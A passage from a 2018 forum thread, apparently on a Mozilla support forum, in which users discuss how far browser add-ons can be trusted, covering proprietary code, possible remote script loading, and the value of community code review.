Page 2 of 2

Re: How is it possible for add-ons to be proprietary

Posted: Sun Apr 01, 2018 8:27 pm
by GµårÐïåñ
rehash wrote:So in conclusion the only way to be sure that by using an add-on you're running only free open software is to check:
  • its license
  • that all files in its XPI are source files and not binary files
  • every last line of its source code, because in one line it can fetch proprietary unknown code and execute it
This is a security and privacy nightmare. Is there any control over add-ons that are offered on addons.mozilla.org and over what they really do? Who checks this and how - for each new version? How can a user know which add-ons are trustworthy?
Pretty much, security is a proactive endeavor not a passive one. You can either trust that they are legit or do your due diligence, unfortunately not much in between. Theoretically WebExtensions alleviate this as they are for all intents and purposes limited to being pure scripted which should imply that you can't do that anymore, but you can theoretically still import external scripts, so there is that. There are I am sure script analyzers you can dump the code into and get a breakdown of what's in there and to expedite analysis a bit but again that's a matter of dealer's choice (meaning what works for you to feel comfortable with something) no one can really tell you how to approach your own piece of mind.

Re: How is it possible for add-ons to be proprietary

Posted: Fri Apr 06, 2018 2:32 pm
by rehash
Have there been lots of known cases of malicious add-ons in the past? Giorgio wrote that a pre-WebExtensions add-on could easily send your disk contents to a remote server https://hackademix.net/2017/12/11/noscr ... ermission/. Would the add-on community even be likely to discover something like that if the add-on was clever and stealthy?

Re: How is it possible for add-ons to be proprietary

Posted: Fri Apr 06, 2018 5:53 pm
by GµårÐïåñ
If there is sufficient community involvement and code review around it, then yes.